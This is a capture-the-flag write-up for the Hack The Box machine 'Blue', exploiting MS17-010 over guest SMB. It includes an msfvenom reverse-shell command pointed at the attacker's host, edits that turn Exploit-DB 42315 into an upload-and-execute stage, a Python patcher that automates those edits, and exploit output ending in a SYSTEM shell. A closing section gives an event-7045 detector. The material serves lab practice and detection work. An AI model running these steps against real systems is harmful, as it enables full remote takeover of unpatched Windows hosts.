10.10.10.40 - Blue

Link: Hack The Box
Created by: ch4p
Points: 20

Open ports

luc@kali:~/HTB/Blue$ nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.40
Port Service
tcp/135 msrpc
tcp/139 netbios-ssn
tcp/445 microsoft-ds
tcp/49152 msrpc
tcp/49153 msrpc
tcp/49154 msrpc
tcp/49155 msrpc
tcp/49156 msrpc
tcp/49157 msrpc

SMB Vulnerability

luc@kali:~/HTB/Blue$ sudo nmap --script "smb-vuln*" -p139,445 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 15:59 CEST
Nmap scan report for 10.10.10.40
Host is up (0.013s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds

This machine is vulnerable to MS17-010, the SMBv1 flaws exploited by EternalBlue and, later, WannaCry. Nmap's check is non-destructive and only confirms the bug; exploiting it still needs a script that fits the level of access we have.

Changing the exploit script

Exploit-DB 42315 is worawit's Python 2 MS17-010 exploit (zzz_exploit.py). It is not the EternalBlue exploit itself: it reaches the bug through a named pipe (samr in the run below), which is why it needs an account that can open an SMB session, even a guest or null one. It imports mysmb.py from the same author, so place that file next to it along with impacket. We need to make two changes to it: the credentials and the post-exploitation action.

This script needs a username and password that can connect to SMB.

luc@kali:~/HTB/Blue$ smbmap -u guest -H 10.10.10.40
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        Share                                                   READ ONLY
        Users                                                   READ ONLY

Guest can open a session (and even read the Share and Users shares), which is all the named-pipe exploit needs, so set the script's credentials accordingly.

USERNAME = 'guest'
PASSWORD = ''

We need a payload for the exploit to execute. msfvenom builds an unstaged x86 reverse shell as a Windows executable; a 32-bit binary runs fine on the 64-bit target.

luc@kali:~/HTB/Blue$ msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.16 LPORT=443 > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

What the exploit does once it holds a SYSTEM-level SMB session is defined in the smb_pwn function. By default it only creates c:\pwned.txt as proof of execution.

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

We replace this body so that it uploads shell.exe to the root of C$ with the script's own smb_send_file helper and then runs it with service_exec, which creates and starts a temporary service, so the binary runs as SYSTEM.

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    # upload the payload to the root of the C$ share
    smb_send_file(smbConn, r'/home/luc/HTB/Blue/shell.exe', 'C', '/shell.exe')
    # run it through a temporary service; Windows accepts forward slashes in the path
    service_exec(conn, r'cmd /c c://shell.exe')
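Making these two edits by hand on every engagement is the error-prone part of the procedure. As an added example (not code from the writeup or from the exploit), the Python 3 script below applies both changes to a copy of 42315.py: it rewrites the module-level USERNAME and PASSWORD and swaps the body of smb_pwn for the upload-and-execute version, relying on the smb_send_file and service_exec helpers that 42315.py already provides. The SAMPLE_EXCERPT it ships with is a constructed fragment of the relevant lines so it can be exercised stand-alone; the patched exploit itself still runs under Python 2.

```python
"""Patch Exploit-DB 42315 (worawit's zzz_exploit.py) for upload-and-execute.

Added example, not part of the writeup or of the exploit. It assumes the
exploit's own helpers smb_send_file(smbConn, local, share, remote) and
service_exec(conn, cmd) exist, as they do in 42315.py, and it leaves the
rest of the script untouched.
"""
import re
import sys

# Replacement post-stage. Strings are filled in with repr() so that quotes
# and backslashes survive inside the generated Python 2 source.
SMB_PWN_TEMPLATE = """def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    # upload the payload to the root of the C$ share ...
    smb_send_file(smbConn, {local!r}, 'C', {remote!r})
    # ... and run it as SYSTEM through a temporary service
    service_exec(conn, {cmd!r})
"""

# Constructed excerpt of the lines of 42315.py that we change, so the
# script can be exercised without the real exploit present.
SAMPLE_EXCERPT = r"""USERNAME = ''
PASSWORD = ''

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

def exploit(target, pipe_name):
    pass
"""


def set_assignment(src, name, value):
    """Rewrite the single module-level `NAME = ...` line; fail loudly if absent."""
    pattern = r'^%s\s*=.*$' % re.escape(name)
    new, n = re.subn(pattern, lambda m: '%s = %r' % (name, value), src, count=1, flags=re.M)
    if n != 1:
        raise ValueError('no top-level %s assignment found' % name)
    return new


def replace_smb_pwn(src, local_payload, remote_path):
    """Swap the whole body of smb_pwn for the upload-and-execute version."""
    # share-relative '/shell.exe' is 'c:\shell.exe' once cmd.exe runs it
    cmd = 'cmd /c c:' + remote_path.replace('/', '\\')
    new_func = SMB_PWN_TEMPLATE.format(local=local_payload, remote=remote_path, cmd=cmd)
    lines = src.splitlines()
    out, i, found = [], 0, False
    while i < len(lines):
        if lines[i].startswith('def smb_pwn('):
            found = True
            out.extend(new_func.rstrip('\n').splitlines())
            i += 1
            # drop the old body: every indented or blank line up to the next top-level line
            while i < len(lines) and (not lines[i].strip() or lines[i][0] in ' \t'):
                i += 1
            out.append('')  # keep one blank line before whatever follows
            continue
        out.append(lines[i])
        i += 1
    if not found:
        raise ValueError('smb_pwn not found')
    return '\n'.join(out) + '\n'


def patch_exploit(src, username, password, local_payload, remote_path='/shell.exe'):
    """Apply both edits from the walkthrough and return the patched source."""
    src = set_assignment(src, 'USERNAME', username)
    src = set_assignment(src, 'PASSWORD', password)
    return replace_smb_pwn(src, local_payload, remote_path)


if __name__ == '__main__':
    # usage: python3 patch_42315.py 42315.py /home/luc/HTB/Blue/shell.exe > 42315_blue.py
    with open(sys.argv[1]) as f:
        sys.stdout.write(patch_exploit(f.read(), 'guest', '', sys.argv[2]))
```

The body replacement is deliberately line-based rather than a regex over the whole file: it consumes every indented or blank line after `def smb_pwn(` and stops at the next top-level statement, so the commented-out alternatives that sit inside the original function disappear with it and nothing after it is touched.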

With a netcat listener already waiting on port 443 (shown below), run the modified exploit against the target:

luc@kali:~/HTB/Blue$ python 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: samr
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80039e4670
SESSION: 0xfffff8a0022246a0
FLINK: 0xfffff8a008379048
InParam: 0xfffff8a0027d315c
MID: 0xd02
unexpected alignment, diff: 0x5ba5048
leak failed... try again
CONNECTION: 0xfffffa80039e4670
SESSION: 0xfffff8a0022246a0
FLINK: 0xfffff8a0027e5088
InParam: 0xfffff8a0027df15c
MID: 0xd07
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 10.10.10.40.....
Creating service LgbE.....
Starting service LgbE.....
The NETBIOS connection with the remote host timed out.
Removing service LgbE.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done

The timeout and the ServiceExec error at the end are expected rather than a failure: shell.exe is not a real service binary and never reports back to the Service Control Manager, so service_exec gives up and removes the service, but the process it started is already running and has connected back to the listener.

luc@kali:~/HTB/Blue$ sudo nc -lnvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.40.
Ncat: Connection from 10.10.10.40:49164.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd ../../Users/Administrator/Desktop
C:\Users\Administrator\Desktop>type root.txt
ff548eb7************************
C:\Users\Administrator\Desktop>cd ../../haris/Desktop
C:\Users\haris\Desktop>type user.txt
4c546aea************************
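Worth knowing from the defender's side as well: service_exec leaves a host-side trace, because Windows logs every service installation as System event 7045, and this run installs a throwaway service named LgbE whose image path is the cmd /c line from the exploit. The Python below is an added example (not code from the writeup) that parses 7045 message bodies and flags installs that look like this stage. The three messages it contains are constructed to mirror the output above and two ordinary installs; they are not real logs from the box.

```python
"""Spot the trace the upload-and-execute stage leaves on the host: a
short-lived service whose image path is 'cmd /c <binary in the drive root>',
recorded by Windows as System log event 7045.

Added example, not part of the writeup. The event messages below are
constructed samples in the layout Event Viewer shows for 7045.
"""
import re
from dataclasses import dataclass

# Constructed 7045 message bodies: the exploit's service, then two normal ones.
SAMPLE_7045 = [
    """A service was installed in the system.

Service Name:  LgbE
Service File Name:  cmd /c c://shell.exe
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem""",
    """A service was installed in the system.

Service Name:  Spooler
Service File Name:  C:\\Windows\\System32\\spoolsv.exe
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem""",
    """A service was installed in the system.

Service Name:  UpdaterSvc
Service File Name:  "C:\\Program Files\\Vendor\\updater.exe" /svc
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  NT AUTHORITY\\LocalService""",
]


@dataclass
class ServiceInstall:
    name: str
    image_path: str
    start_type: str
    account: str


FIELD = re.compile(r'^(Service Name|Service File Name|Service Start Type|Service Account):\s*(.*)$', re.M)


def parse_7045(message):
    """Pull the service fields out of a 7045 message body."""
    fields = dict(FIELD.findall(message))
    return ServiceInstall(fields['Service Name'], fields['Service File Name'],
                          fields['Service Start Type'], fields['Service Account'])


RANDOM_NAME = re.compile(r'^[A-Za-z]{4}$')                     # four letters, like LgbE
SHELL_PREFIX = re.compile(r'^(?:cmd(?:\.exe)?|powershell(?:\.exe)?)\s', re.I)
DRIVE_ROOT = re.compile(r'^"?[a-z]:[\\/]+[^\\/"]+"?$', re.I)   # c:\x.exe or c://x.exe, no subdirectory


def classify(svc):
    """Return the reasons a service install looks like a remote-exec artefact."""
    reasons = []
    if RANDOM_NAME.match(svc.name):
        reasons.append('four-letter service name')
    if SHELL_PREFIX.match(svc.image_path):
        reasons.append('image path is a shell command, not a service binary')
    # look at what cmd /c actually launches, not at cmd itself
    target = re.sub(r'^cmd(?:\.exe)?\s+/c\s+', '', svc.image_path, flags=re.I)
    if DRIVE_ROOT.match(target):
        reasons.append('binary sits directly in a drive root')
    # SYSTEM plus on-demand start is normal on its own; only corroborates other hits
    if reasons and svc.account.lower() == 'localsystem' and svc.start_type.lower() == 'demand start':
        reasons.append('runs as SYSTEM, started on demand')
    return reasons


def triage(messages):
    """Map suspicious service names to their reasons; clean installs are dropped."""
    hits = {}
    for msg in messages:
        svc = parse_7045(msg)
        reasons = classify(svc)
        if reasons:
            hits[svc.name] = reasons
    return hits


if __name__ == '__main__':
    for name, reasons in triage(SAMPLE_7045).items():
        print(name, '->', '; '.join(reasons))
```

The rules are narrow on purpose: a four-letter name, a shell command in the image path and a binary dropped straight into a drive root are each rare for legitimate services, and together they describe exactly what the exploit run above produced. A quieter attacker would rename the payload and park it under a plausible directory, so treat these as a starting point rather than a complete detection.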

TL;DR

  • Machine is vulnerable to MS17-010; exploiting it gives nt authority\system access
  • SMB allows guest sessions, which is all the named-pipe variant of the exploit (Exploit-DB 42315) needs
  • Replacing the exploit's smb_pwn hook with an upload-and-execute stage returns a reverse shell as SYSTEM